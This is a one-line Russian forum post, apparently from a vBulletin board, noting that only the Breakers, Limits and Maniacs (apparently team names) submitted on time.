Вовремя проставились только Брейкеры, Лимитсы и Маньяки.
vBulletin v3.8.7 (Russian), Copyright ©2000-2024, Jelsoft Enterprises Ltd.